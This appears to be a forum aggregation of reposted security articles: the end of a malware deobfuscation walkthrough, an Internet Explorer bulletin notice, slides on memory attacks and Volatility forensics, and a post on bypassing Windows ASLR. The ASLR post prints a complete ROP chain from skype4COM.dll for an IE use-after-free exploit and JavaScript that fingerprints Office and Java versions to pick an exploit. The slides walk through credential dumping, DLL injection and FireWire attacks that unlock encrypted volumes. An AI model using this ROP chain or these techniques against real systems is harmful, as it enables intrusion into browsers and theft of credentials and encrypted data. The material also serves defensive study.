[ebp-10h], which is later called at the 0x0040367C address: “0040367C call dword ptr [ebp-10h]“. The code that follows copies the ntdll file into the previously reserved address space in memory and then calls the function sub_4030E5, which we can see on the picture below: The sub_4030E5 Function Let’s analyze the sub_4030E5 function just for the fun of it. Let’s present the start of the disassembly instructions of that function: The function is first creating a new stack frame and reserving 0×310 bytes for the local variables. After that, we’re entering a very interesting loop, as can be seen on the picture below: With the jz instruction we’re jumping to the “mov esi, edx” instruction, which stores the value from register edx into register esi. But the important thing is what happens next; we comparing the value in esi with the constant 0x190BC2. If the values are equal, we’re ending the loop and moving on with the program execution. Otherwise, we’re continuing the execution of the loop. First, we’re adding the constant 8 to the address in the ecx register and reading the value from that address into register esi, then comparing that value with the value in ebx. When entering that block for the first time, the ecx register contains the value 0x087E0000. This is why we’re actually reading the value from the address 0x087E0008 and other consecutive addresses. The values at those addresses are presented on the picture below: The ebx register contains the value 0×00000000, which means that we’ll be reading every other value from address 0x087E0008 onwards until reading the value 0x00190BC2 or reaching the end of the data structure (the 0×00000000 value). If we place a breakpoint on the address 0x0040311E and run the program, the breakpoint will be hit right at the moment when the value at the address stored in register ecx matches the 0x00190BC2 constant. When that happens, the value in ecx register is 0x087E0420. If we take a look at the memory address,, we can see that this is truly the case: What’s happening in this case is that the program is going through the export table of the ntdll.dll library trying to match the checksum of a function with constant 0x00190BC2. Here we’re reading the next 4 bytes from the currently found address into register ecx. This means that the register ecx will contain the value 0x0000C1AE (take a look at the previous image where we’ve dumped the memory). This is also the reason why we’ve been reading every other 4 bytes and leaving the middle four bytes alone when matching the checksum; I guess the middle 4 bytes hold some specific information regarding the previous checksum value, so that every checksum value has it’s corresponding additional 4 bytes used for something which we currently don’t know yet. Then we’re adding the value in register edi to the value in register ecx and storing the value on the stack at offset [ebp+var_C]. Later, in the same function, we’re calling this value, which means that we’ve probably calculated some kind of address. If we place a breakpoint to that function and run the program, the breakpoint is hit right at the moment where we can step into the function being called. When we step into the function, we’re actually executing the following code: We’re pushing the value 0x00156DC5 to the stack and returning to that function. The function then starts… as presented on the picture below: We won’t go into details what this function does; let’s just say that it calls multiple functions, which we’ll take a look at here. The function calls the following functions: debug006:00156DD0 call near ptr unk_151EDF debug006:00156DED call off_174998 debug006:00156E09 call near ptr unk_16C977 debug006:00156E6D call off_174990 Let’s take a look at the code of every single function call. First, we have the function at address 0x00151EDF. Its code is presented below: We can see that function does nothing special; it just initialized the stack for the function call to data cross-reference off_141280 that holds the value of the kernel32_WaitForSingleObject function: If we step into the function, it’s clear that the function WaitForSingleObject from the kernel32 DLL is being called. This can be seen on the picture below: Let’s continue to the next function at address 0×00174998, where it’s immediately evident that the NtQueryInformationProcess function is being called: If we step into the function at address 0x7C90D808, it’s clear that the KiFastSystemCall function is being called, as seen on the picture below: We can see that we’re moving the value of esp into the register edx. The registers, before executing the sysenter instruction, are presented below: Be the first to hear of new free tutorials, training videos, product demos, and more. We'll deliver the best of our free resources to you each month, sign up here: Upon stepping into the sysenter instruction, we’re immediately taken to the previously called function, which is NtQueryInformationProcess. You can see that on the picture below (notice the EIP pointing at the retn instruction after the function call): Let’s take a look at the next function call at address 0x0016C977. The code at that function is too big to fit it into a picture, which is why I’m presenting only the function calls at that function, which can be seen below: debug006:0016C977 ; --------------------------------------------------------------------------- debug006:0016C977 debug006:0016C977 loc_16C977: ; CODE XREF: debug006:00156E09#p debug006:0016C984 call off_141270 debug006:0016C99F call off_1411D8 debug006:0016C9B5 call off_141214 debug006:0016C9C0 call off_1412BC debug006:0016C9CA leave debug006:0016C9CB retn 4 The call to off_141270 causes subsequent calls to the following functions: kernel32_CreateToolhelp32Snapshot, kernel32_GetCurrentProcessId, kernel32_CloseHandle and others. The call at off_1411D8 causes the program to call kernel32_Thread32First. Finally, the call at off_1412BC causes the program to call kernel32_CloseHandle. The function call at off_174990 calls the instructions presented on the picture below: This essentially calls the function loc_7C90D1B8 presented below: And those instructions then call the KiFastSystemCall presented on the picture below: Conclusion We’ve seen how to deobfusate the obfuscated code in Ida and presented the way how to apply various structures to the executable, which may come in handy if the malware is trying to grab some value from the executable PE header. We’ve also taken a look at the sub_4030E5 function that calls various system functions in the kernel32.dll library. Sursa: InfoSec Institute Resources – Cracking the Defender: The Deobfuscated Code

February 2013 Internet Explorer updates Today we released two critically rated bulletins and one security advisory for Internet Explorer. Microsoft Security Bulletin MS13-009- Critical This security update resolves thirteen privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer. An attacker who successfully exploited these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10 on Windows servers. For more information, please see the full bulletin. Microsoft Security Bulletin MS13-010 – Critical This security update resolves a privately reported vulnerability in the Microsoft implementation of Vector Markup Language (VML). The vulnerability could allow remote code execution if a user viewed a specially crafted Web page using Internet Explorer. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, and Internet Explorer 10 on all supported releases of Microsoft Windows. For more information, see the full bulletin. Microsoft Security Advisory (2755801) Microsoft is also announcing the availability of an update for the Adobe Flash Player in Internet Explorer 10 on all supported editions of Windows 8, Windows Server 2012, and Windows RT. The update addresses the vulnerabilities in Adobe Flash Player by updating the affected Adobe Flash libraries contained within Internet Explorer 10. For more information please see the full advisory. Recommendation. Most customers have automatic updating enabled and will not need to take any action because this security update will be downloaded and installed automatically. Customers who have not enabled automatic updating need to check for updates and install this update manually. For information about specific configuration options in automatic updating, see Microsoft Knowledge Base Article 294871. For administrators and enterprise installations, or end users who want to install this security update manually, Microsoft recommends that customers apply the update immediately using update management software, or by checking for updates using the Microsoft Update service. — Tyson Storey, Program Manager, Internet Explorer Sursa: February 2013 Internet Explorer updates - IEBlog - Site Home - MSDN Blogs

[h=3]Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech Bridge[/h]I am sure you remember excellent reverse engineering presentations by High-Tech Bridge experts I posted earlier. High-Tech Bridge presented at the ISACA event in Luxembourg and you can download their detailed and very interesting presentation: “Manipulating Memory for Fun and Profit". The presentation includes detailed memory forensics process using Volatility by Frédéric BOURLA Chief Security Specialist Head of Ethical Hacking & Computer Forensics Departments High-Tech Bridge SA Table of Contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion Download the full presentation in PDF The text of the presentation (for Google search and to get an idea about the contents:) ======================== Manipulating Memory for Fun & Profit 6 February 2013 Frédéric BOURLA Chief Security Specialist ======================== # readelf prez * Slides & talk in English. * Native French speaker, so feel free to send me an email in French if case of question. * Talk focused on Memory Manipulation, from both offensive and defensives angles. * 1 round of 45’. * Vast topic, lots of issues to address, and lots of slides so that the most technical of you can come back later to remember commands. * Therefore some slides [specially the beginning] will be fast, but everything is summarized in demos. * No need to take notes, the whole slides and demos will be published on High-Tech Bridge website. ======================== # readelf prez * Despite its name, this talk will not deal with Total Recall or any other human memory manipulation based movie. * Nor will it deal with classical binary exploitation, such as Stack based Buffer Overflows or Heap Spraying. I strongly advice to read corelanc0d3rs’ papers on corelan.be to learn more regarding Exploit Writing. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== # man mem * RAM (Random Access Memory) is a temporary memory accessible by the CPU in order to hold all of the program code and data that is processed by the computer. * It is called “random” because the system can directly access any of the memory cells anywhere on the RAM chip if it knows its row (i.e. “address”) and its column (i.e. “data bit”). * It is much faster to access data in RAM than on the hard drive. * CPU and OS determine how much and how the available memory will be used. ======================== # man mem * In other words, most users do not have any control on memory, which makes RAM a target of choice. * First systems were arbitrary limited to 640Kb RAM. Bill Gates once declared that “640K ought to be enough for anybody”. * At this time it was far enough… But today the OS itself can consume 1 Gb. We therefore use much more memory. * On a 32 bits Windows system, OS can directly address 2^32 cells, and is therefore mathematically limited to 4 Gb memory. ======================== # man mem * Contrary to popular assumption, RAM can retain its content up to several minutes after a shutdown. * Basically RAM is everywhere nowadays. Printers, fax, VoIP phones, GPS and smartphones are good examples. * This provide some opportunities to security professionals [and also to bad guys]. Some points of this talk can be applied to various targets and may not be limited to Windows systems, even if since now we will deal with a classical Microsoft host. ======================== # man mem * Upon process instantiation, the code is mapped in memory so that the CPU can read its instructions, and each process has his own virtual memory. * OS relies on page table structures to map transparently each virtual memory address to physical memory. * But most importantly, any program [including both its data and its instructions] must first be loaded into memory before being run by the processor. ======================== # man mem * For example, FUD Trojans which highly rely on Packers & Crypters can be quickly uncovered through memory analysis. * The same principle applies to OFTE. Memory Analysis can save your investigator's life, should you be facing a drive with On The Fly Encryption capabilities. To be efficient, transparent and usable, the [encrypted] key should be somewhere in memory. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Post keylogging capacities * A colleague just used your laptop to access a restricted page, and you regret you didn’t have time to run your favourite keylogger? :-] ======================== Post keylogging capacities * No a problem, you may be able to browse the Internet browser’s memory to grab his credentials. ======================== Post keylogging capacities * Besides this joke, have you ever wished you had saved your new email before a touchpad problem occurs and make you loose 30 minutes? ======================== Post keylogging capacities * But you may not be obliged to restart writing everything from scratch if you browse the process memory shortly. ======================== Stars revelation * In a pivoting attack, it can be very useful to reveal what’s behind the stars... Don’t forget, Windows remembers lots of passwords in behalf of users. * Lots of tools do exist, such as Snadboy's Revelation. Unfortunately, most of them do not work against recent OS. * BulletsPassView is one of the remaining tools which still works under Windows 7. There is even a 64 bits version. * Anyway, it also does not work under Windows 8. ======================== Stars revelation ======================== Stars revelation * Pillaging passwords often provide the keys of the kingdom. ======================== Memory Patching * Memory Patching is the first stone to build a Crack or create a Keygen in the Warez world. * It basically consists of locating and bypassing binary protections in memory in order to finally implement the trick in the targeted file. ======================== Memory Fuzzing * Fuzz Testing, aka Fuzzing, consists in providing invalid, unexpected, or random data to the inputs of a monitored program to detect security issues [among others]. * General approach to Fuzzers: ======================== Memory Fuzzing * Memory-oriented Fuzzing: ======================== Memory Fuzzing * Here is an example from dbgHelp4j, a memory fuzzing project under development at High-Tech Bridge: * To learn more, read Xavier ROUSSEL’s paper. * This short demonstration shows how dbgHelp4j permits to identify rapidly an old buffer overflow in the CWD Command of Easy FTP Server v1.7.0.11. ======================== DLL Injection * Another well-known memory abuse consists in injecting arbitrary code into the memory space of another process, for example through a CreateRemoteThread like function. * Such an injection permits the attacker to benefit from the rights of the target process, and often to bypass firewalls. * This also enable its author to hide himself from most users, as threads are not displayed in Windows Task Manager. ======================== DLL Injection * Native task manager does not display current threads within a process. ======================== DLL Injection * Here a DLL based Reverse Trojan is injected into IE memory space. ======================== DLL Injection * Trojan reaches its C&C Server via HTTP through Internet Explorer [whose behaviour sounds right]. ======================== DLL Injection * From a Pivoting Attack point of view, DLL Injection is widely used during Privilege Escalation. * There are a lot of tools, such as CacheDump, PWDump6, LSADump2 or PWDumpX. * Most tools actually inject their nasty code into the Local Security Authority Subsystem (LSASS) to reach hashes. * The latter is amazingly efficient and permits a user with administrative privileges to retrieve [either locally or remotely] the domain password cache, password hashes and LSA secrets from a Windows system. ======================== Process Memory Dump * Some processes write sensitive data in memory in clear text format, or without relying on heavy encryption. * Specific process memory dumps may allow an attacker to grab interesting data. * Lots of tools do exist. One of the best ones is probably ProcDump, from Mark Russinovich. * It’s a powerful command-line utility which primary purpose is to monitor applications for CPU spikes in order to generate a crash dump with the purpose of helping the developer to debug. ======================== Process Memory Dump * It has plenty of amazing features. Anyway, here our goal is simply to dump the memory contents of a process to a file [without stopping the process of course]. * So lots of tools can also do the job, such as PMDump from NTSecurity. * Sometimes we can find very sensitive information, such as usernames, computer names, IP addresses, and even passwords. * This is for example the case if you dump the memory of PwSafe. Not all fields are encrypted in memory. ======================== Process Memory Dump * For sure, password fields are not stored in memory in plaintext, but unfortunately other fields are. And sysadmin’s notes are often very juicy... * There is hope to collect credentials, map network resources, identify services, ports, sudoers account, and so on. * Even if the auditor is unlucky and does not grab passwords, he can still create a user list file for further dictionary attacks. ======================== Process Memory Dump * Process Memory Dump files are quite light. * During a Pivoting Attack in an Internal Penetration Test, it may worth a try to launch a memory dump against sensitive processes. ======================== Process Memory Dump * Something as easy as parsing the process memdump for strings may reveal interesting stuff to a pentester. ======================== Process Memory Dump * Here the Password Safe application permits an attacker to fingerprint the network, and to collect usernames, IP addresses and ports. * Very useful to carry out further attacks. ======================== Process Memory Dump * Here the network administration tool mRemote leaks internal path, IP address and TCP port of an SSH enabled server… As well as the username & password of a root account! ======================== Full Memory Dump * If you have a good bandwidth and you are not so limited by the time, why not dumping the whole memory? * An offline analysis of the whole memory dump may even reveal more important stuff. Even in the case of FDE, users may have opened sensitive TXT documents for example. * You may add DumpIt to your toolkit. It is a one-click memory acquisition application for Windows released by MoonSols. It’s a great tool which combines win32dd and win64dd in one executable. It is fast, small, portable, free and ultra easy to use. Just run in to dump the physical memory in the current directory. ======================== Cold Boot Attacks * It is a common belief that RAM looses its content as soon as the power is down. * This is wrong, RAM is not immediately erased. It may take up to several minutes in a standard environment, even if the RAM is removed from the computer. * And it may last much longer if you cool the DRAM chips. With a simple dusty spraying at -50°C, your RAM data can survive more that 10 minutes. * If you cool the chips at -196°C with liquid nitrogen, data are hold for several hours without any power. ======================== Cold Boot Attacks * It is then possible to plug the RAM in another system to dump their content to carry out an offline analysis. * In particular, encryption tools deeply rely on RAM to store their keys. Therefore such attacks are mostly aimed to defeat FDE, such as BitLocker, FileVault, dm-crypt, and TrueCrypt. * And even if there is some kinds of degradation in the memory contents, some algorithms can intelligently recover the keys. * To know more, read the Princeton University's paper. ======================== DMA based attacks * IEEE1394, aka FireWire, is a serial bus interface standard for high-speed communications and isochronous real-time data transfer. * According to Wikipedia, it “supports DMA and memory-mapped devices, allowing data transfers to happen without loading the host CPU with interrupts and buffer-copy operations”. * In other words, you can read [and write] in the target’s memory through its FireWire interface! * This security problem is not new [2004], but still exists today as it relies in IEEE 1394 specifications. ======================== DMA based attacks * A few years ago, attackers could use WinLockPwn. Today they have Inception tool, from ntropy. * Inception is a physical memory manipulation and hacking tool which nicely exploits IEEE 1394 SBP-2 DMA [Serial Bus Protocol 2]. * The tool can unlock and escalate privileges to Administrator / Root on almost any powered on machine you have physical access to. * The tool works over any interface that expands and can master the PCIe bus, such as FireWire, Thunderbolt, ExpressCard and PCMCIA (PC-Card). ======================== DMA based attacks * It is initially made to attack computers that utilize FDE, such as BitLocker, FileVault, TrueCrypt or Pointsec. * You just need a Linux / Mac OS X system and a target which provides a FireWire / Thunderbolt interface, or an ExpressCard / PCMCIA expansion port. * There are for sure some limitations, such as the 4 GiB RAM bugs or the restrictions on OS X Lion targets [which disables DMA when the user is logged out as well as when the screen is locked if FileVault is enabled], but most often FireWire means P0wned. ======================== DMA based attacks * Just a few lines to install on a your BackTrack: * The short following demo of Inception exploits the FireWire interface of an up-to-date Windows 7 system to patch the msv1_0.dll file and unlock the running session. ======================== DMA based attacks * This kind of DMA based attacks also permit to attack mounted encrypted volumes, such as a TrueCrypt archive. * You can for example boot your attacking system with PassWare FireWire Memory Imager from Passware Kit Forensics, and search for AES keys in the target memory through FireWire. * You can basically defeat BitLocker, TrueCrypt, FileVault2 & PGP encryption volumes. * To know more: http://www.breaknenter.org/projects/inception/ http://support.microsoft.com/kb/2516445 ======================== DMA based attacks * The following slides illustrate an attack on a TrueCrypt volume created on an 8 Gb memory stick. * First step was to backup the encrypted drive. ======================== DMA based attacks * Then let’s begin the attack on a mounted volume when the user went. ======================== DMA based attacks * Dump the physical memory of the target system through our favourite FireWire interface. ======================== DMA based attacks * And attack the key material in memory… ======================== DMA based attacks * The attack only last a couple of minutes. ======================== DMA based attacks * And you should get an unencrypted raw volume. ======================== DMA based attacks * You just have to fill a new memory stick with this raw image… ======================== DMA based attacks * And that’s it ! Just plug your new device… ======================== DMA based attacks * And enjoy your TrueCrypt less volume. ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Circumventing FDE * Traditional Forensics approach faces problem with encryption, especially with FDE. * If the investigator “pulls the plug” and creates a bit-for-bit image of the physical hard drive, he most probably destroys the best chance of recovering the plaintext data, as well as all common memory artefacts. * With FDE, it is usually far better to make a bit-for-bit image of the logical device while the system is still running, even if underlines disk activities are generally not welcome… And even if we rely on an untrusted OS to present what is actually on the disk, therefore prone to anti-forensic techniques. ======================== Circumventing FDE * If we begin by capturing the volatile memory, then we can potentially extract the cryptographic keys from the memory image to decrypt and analyse the disk image. * The only one challenge usually consists in uniquely identifying key materials among gigabytes of other data. * It is usually achieved with a mixed of entropy analysis [limited because of the short length of symmetrical keys and the randomness of other data, such as compressed files] and brute force attack [Known-Plaintext Attack, where the attacker has samples of both the plaintext and the ciphertext]. * To learn more: “RAM is Key - Extracting Disk Encryption Keys From Volatile Memory", by B. Kaplan and M. Geiger). ======================== Code Analysis via API Hooking * A quick way to have an idea of what a binary does is to analyse its API calls. * You can do it easily with APISpy32 for example, from Pietrek. * You just need to populate a configuration file with the name of all the API [e.g. per a strings] you want to enable Hooking, and you get a nice malcode monitoring tool. * Next slide shows common API use in malware. ======================== Code Analysis via API Hooking Common API Malware URLDownloadToFile, FtpGetFile, FtpOpenFile Dropper CreateRemoteThread, NtWriteVirtualMemory, LoadLibrary and similar (LoadLibraryA, LoadLibraryExA, LoadLibraryExW, etc.) Injection BeginPaint (to disable local screen changes when a VNC session is activated) Zeus Accept, Bind Backdoor Connect, CreateNamedPipe, ConnectNamedPipe, DisconnectNamedPipe Dropper and Reverse Trojan IsDebuggerPresent, CheckRemoteDebuggerPresent Anti debugger ======================== Code Analysis via API Hooking Common API Malware CryptCreateHash, CryptEncrypt, CryptGetHashParam Encryption DeviceIoControl, NtLoadDriver, NtOpenProcess Rootkit HttpOpenRequest, HttpSendRequest, InternetConnect Exfiltration ModifyExcuteProtectionSupport, EnableExecuteProtectionSupport, NtExecuteAddFileOptOutList DEP SetSfcFileException Windows File Protection alteration ======================== Memory Forensics * It is probably the best way to identify the most hidden evil code, such a Rootkits. * And don't forget that some malware can live in memory without ever touching the hard disk. This is for example the case with MSF Meterpreter, which is injected into existing process memory. * Stealth malware also work in that manner [mostly in targeted hacking against big companies]. * Hard disks are amazingly big today. Simply creating a raw image can take very long time... Sometimes several days. Analysing memory is much faster. ======================== Memory Forensics * But there are also some minor drawbacks… Indeed, the memory image will only give us information on what was running at a particular time. We will not see the most visible piece of malcode if it was not running when we proceed with the imaging [unless some tracks remain in undeleted structures]. * And fore sure, to make an image of the memory we first need to run once a specific utility... Which will be loaded in the targeted memory! As a consequence, it is always possible to alter evidence [even if chances are really low with a light utility]. * Anyway, it definitely worth a try as a fast analysis can help you spot the evidence very quickly. :-] ======================== Memory Forensics * Any kind of physical memory abstract could be usable, such as a Memory Dump, a Crash Dump, an hibernation file or a VMEM file for virtual machines. ======================== Memory Forensics * Memory Forensics is a very huge project, as memory mappings differ from OS, SP and patch levels, and as vendors usually do not really document their internal memory structures. * Nevertheless, it is mature and efficient since a few years. Nowadays, we are not limited anymore to ASCI and Unicode grep, and we can now rely on powerful tools which parse well known memory structures. ======================== Memory Forensics * For sure, we are still facing challenging problems, and tools may be limited by Paging and Swapping which can prevent investigators from analysing the whole virtual address space of a specific process [unless they also dig into the pagefile.sys for example]… * But it is still really effective for Malware Analysis! * Besite commercial tools, free solutions do exist, such as Radare and Volatility. The later simply became impressing. * Since last year, Volatility also support MAC systems. ======================== Memory Forensics * Shall you need to carry out a Memory Forensics on a Windows, Linux, Mac or Android system, I strongly advise you to have a look on Volatility. * It is basically a Python based tool for extracting digital artefacts from volatile memory [RAM] samples which offer an amazing visibility in the runtime state of the system. * You can easily identify running processes and their DLL, Virtual Address Descriptor [VAD], System call tables [IDT, GDT, SSDT], environment variables, network connections, open handles to kernel and executive objects, and so on. ======================== Memory Forensics * It can even be used to dump LM and NTLM hashes, as well as LSA secrets… ======================== Memory Forensics * Well, for French targets there is a little bug [because of accents]... You will have to adapt a little bit the code: ======================== Memory Forensics * But beside this, it is really efficient to track malcode. Let’s dig into a real example… ======================== Memory Forensics * Heavy malware may be digitally signed by a trusted CA. ======================== Memory Forensics * And may be really appear benign to your users. ======================== Memory Forensics * Here it was an obfuscated .Net based Dropper. ======================== Memory Forensics * Even if you manually find the embedded payload, nearly everything is packed to disturb Reverse Engineers. ======================== Memory Forensics * The only one unencrypted payload was a kind of anti-restoring feature, which basically hooks specific API to prevent system administrators to remove the malware [e.g. by killing his task manager]. * And then? What’s next? We could spend lots of time in a Reverse Engineering phase, or analyse its behaviour in a sandbox [if the code doesn’t detect it]… * …And we can simply see what’s happen in memory. ======================== Memory Forensics * Just infect voluntarily your VM or your lab workstation. * And use one of the good existing tools to dump the whole memory: * Memory from Mandiant * FTK Imager from AccessData * FastDump from HB Gary * DumpIt and Win32dd / Win64dd from Moonsols * And of course your favourite FireWire interface * Before using Volatility to dissect this memory dump. ======================== Memory Forensics * Let’s begin to get basic information on our dump file. ======================== Memory Forensics * The PSLIST command quickly show processes. ======================== Memory Forensics * You can arrange them by tree view. ======================== Memory Forensics * This process list can be quickly obtained by parsing a Kernel double chained list. Nevertheless, this list can be altered by malware, such as Rootkits, which therefore hide themselves from common system tools. * A deep research can then be achieved, which consist in parsing the whole memory dump to locate EPROCESS structures. These Kernel structures do exist for each process, no matter what the double chained list [known as Process Control Block] is. * A process listed in a PSCAN and not in a PSLIST often indicate a threat [mostly permitted via API Hooking]. ======================== Memory Forensics * The PSCAN is longer but may reveal hidden code. ======================== Memory Forensics * Similarly, you can find processes which attempt to hide themselves on various process listings through the PSXVIEW command: ======================== Memory Forensics * Several Volatility commands works in this way and offer a SCAN variant to try to recognize specific structures in memory, thus revealing hidden sockets and connections for example. * For sure you may have [often quickly identified] false positives, as some process may gave been legitimately closed for example, thus letting some orphan EPROCESS data structures in RAM. * Nevertheless, some process may still be really running, and therefore instantaneously reveal a serious security issue. ======================== Memory Forensics * Established and recently closed connexions are also quickly revealed. ======================== Memory Forensics * And you can also easily explore the registry, which is widely used by malcode writers for various purpose [e.g. to permit their code to survive reboot]. ======================== Memory Forensics * As well querying loaded drivers [often used by Rootkits]. ======================== Memory Forensics * You can even parse loaded libraries to detect API Hooking, also widely used by Rootkits. Here a trampoline has been placed in the wbemcomm DLL [to hook certain WMI queries]. ======================== Memory Forensics * You can extract suspicious file [through PID or offset] from the memory dump to carry out further investigation. ======================== Memory Forensics * And quickly identify a Key Logger. ======================== Memory Forensics * In fact, you can enumerate all opened files and even loaded DLL within a specific process… And drop them back on disk for investigation. ======================== Memory Forensics * The dumped process may not be runable, but would still offer you a quite easy to understand code [at least you don't have anymore to unpack it]. For example: strings dumpedfile | egrep -i 'http|ftp|irc|\.exe' * Even more powerful, you can rely on the MALFIND command to perform advanced search using Regex, Unicode or ANSI strings... * And most importantly, it permits to quickly find hidden or injected code through the VAD tree inspection [very useful in case of DLL which may have been unlinked from the LDR lists by the malcode loader in order to avoid its detection]. ======================== Memory Forensics * Here the MALFIND command reveals that an arbitrary code was injected into the CRSS.exe system process. ======================== Memory Forensics * We can quick parse MALFIND results to bring out running processes which were infected by such code injection. ======================== Memory Forensics * Even powerful rootkits quickly draw your attention. ======================== Memory Forensics * We can also use the Yara malware identification feature to directly scan for patterns inside a PID or within a specific memory segment. Here we see that an injected code inside the SVCHOST process established a connection to dexter.servequake.com:4444 via HTTP and download the 1234567890.functions resource. ======================== Memory Forensics * For sure, the RAT payload is encrypted, but in a few minutes you identified the threat and dig quite deeply into the real problem. ======================== Memory Forensics * You can now extract the guilty binary code along with the related memory segments and begin a classical malware analysis. ======================== Memory Forensics * And if you like high-level view for your incident report, why not extend Volatility with Graphviz to make something more visual? ======================== Memory Forensics * That’s it. I hope I have piqued your interest with one of the most important Forensics innovations of those last few years. The whole demo is attached here. * To learn more: SANS Forensics 610 Training Course [GREM] https://www.volatilesystems.com/default/volatility http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx http://www.ualberta.ca/CNS/RESEARCH/LinuxClusters/mem.html http://www.tenouk.com/visualcplusmfc/visualcplusmfc20.html ======================== Table of contents 0x00 - About me 0x01 - About this conference 0x02 - Memory introduction 0x03 - Memory manipulation from an offensive angle 0x04 - Memory manipulation from a defensive angle 0x05 - Conclusion ======================== Conclusion * I hope I have achieved my goal of opening the doors to a fascinating world which could easily allow security analysts to save lots of time during their recurrent duties… * …And that you will see your own system [and the ones you asses] from a different angle. * …And that you will now have the reflex of dumping the whole memory in case of incident. * …And that you will reconsider security when the physical aspect in concerned. :-] Sursa: contagio: Manipulating Memory for Fun and Profit by Frédéric Bourla - High-Tech Bridge

[h=2]Bypassing Windows ASLR using “skype4COM” protocol handler[/h] While investigating an unrelated issue using SysInternals Autoruns tool I spotted a couple of protocol handlers installed on the system by Skype. Knowing that protocol handlers can be loaded by Internet Explorer without any prompts I decided to check if these libraries have there dynamic base bits set. It turns out that the “skype4com.dll” library has not which means it could be used to bypass Windows ASLR so I got to work writing my rop chain and testing it out. A quick test to see if it indeed loads up can be done from the code below <SCRIPT language="JavaScript"> location.href = 'skype4com:' </SCRIPT> Filename - Skype4COM.dll Path - C:\Program Files\Common Files\Skype\ MD5 hash - 6e04c50ca4a3fa2cc812cd7ab84eb6d7 Size - 2,156,192 bytes Signed - 03 November 2011 11:46:40 Version - 1.0.38.0 and here is my rop chain without any nulls. 0x28025062 # POP EBX # RETN 0xa13fcde1 # 0xA13FCDE1 0x28024f71 # POP EAX # RETN 0x5ec03420 # 0x5EC03420 0x28027b5c # ADD EBX,EAX # XOR EAX,EAX # RETN (EBX=0x201, 513 bytes) 0x28024f71 # POP EAX # RETN 0xa13fcde1 # 0xA13FCDE1 0x280b4654 # ADD EAX,5EC0325F # RETN 0x28099a83 # MOV EDX,EAX # MOV EAX,ESI # POP ESI # RETN (EDX=0x40) 0x41414141 # Compensate 0x28017271 # POP ECX # RETN 0x280de198 # VirtualProtect() pointer [IAT] 0x28027b5b # MOV EAX,DWORD PTR DS:[ECX] # RETN 0x28041824 # XCHG EAX,ESI # ADD EAX,48C48300 # RETN 0x08 0x2806405a # POP EBP # RETN 0x41414141 # Compensate 0x41414141 # Compensate 0x280bc55b # & push esp # ret 0x28017271 # POP ECX # RETN 0x28126717 # &Writable location 0x28098730 # POP EDI # RETN 0x28098731 # RETN (ROP NOP) 0x28024f71 # POP EAX # RETN 0x90909090 # nop 0x28043527 # PUSHAD # RETN I’ve created an exploit using this rop chain on the “CButton Object Use-After-Free vulnerability” (CVE-2012-4792) taken from Metasploit. It has been tested on Windows 7 Enterprise (32bit) in VM with the latest version of Skype installed (6.2.59.106). The exploit can be downloaded from here, the password is “exploit” and the md5 hash of the zip file is 4d5735ff26b769abe1b02f74e2871911 Mitigation? Well I said it before and I’ll say it again . . . “EMET” your machines ASAP On something off topic, I was looking at the html code posted on Pastebin for the CVE-2012-4792 exploit and liked the way it checked to see if Office 2010 or 2007 was installed. Some blog posts weren’t as clear as to what the Office check routine was actually doing but really it was just determining which hxds.dll version to use for its rop chain for the Office version it detected. (I haven’t got the actual exploit files to confirm though but I’m pretty sure). For Office 2010 it installs 4 OpenDocuments ActiveX objects SharePoint.OpenDocuments.4 SharePoint.OpenDocuments.3 SharePoint.OpenDocuments.2 SharePoint.OpenDocuments.1 and Office 2007 only 3 SharePoint.OpenDocuments.3 SharePoint.OpenDocuments.2 SharePoint.OpenDocuments.1 So basically if the JavaScript is able to load “SharePoint.OpenDocuments.4? then it knows that it’s Office 2010. Since these ActiveX controls can be run without permissions no prompts are given. Below is a simple script that could be used if say in this example checking Windows 7 with IE8 has got installed Office 2007/2010 or Java 6. No Skype ActiveX controls gets installed that can be run without permissions so I couldn’t work out how to check if Skype is installed without triggering prompts in Internet Explorer. If you do know how to check without triggering prompts please do share. <HTML> <SCRIPT language="JavaScript"> // // if (CheckIEOSVersion() == "ie8w7") { if (CheckOfficeVersion() == "Office2010") { // Exploit call here } else if (CheckOfficeVersion() == "Office2007") { // Exploit call here } else if (JavaVersion() == "Java6") { // Exploit call here } else if (SkypeCheck() == "") { // Exploit call here } } // // function CheckIEOSVersion() { var agent = navigator.userAgent.toUpperCase(); var os_ie_ver = ""; // if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 7') > -1)) os_ie_ver = "ie7wxp"; if ((agent.indexOf('NT 5.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8wxp"; if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 7') > -1)) os_ie_ver = "ie7wv"; if ((agent.indexOf('NT 6.0') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8wv"; if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 8') > -1)) os_ie_ver = "ie8w7"; if ((agent.indexOf('NT 6.1') > -1)&&(agent.indexOf('MSIE 9') > -1)) os_ie_ver = "ie9w7"; if ((agent.indexOf('NT 6.2') > -1)&&(agent.indexOf('MSIE 10') > -1)) os_ie_ver = "ie10w8"; return os_ie_ver; } // // function CheckOfficeVersion() { var offver = 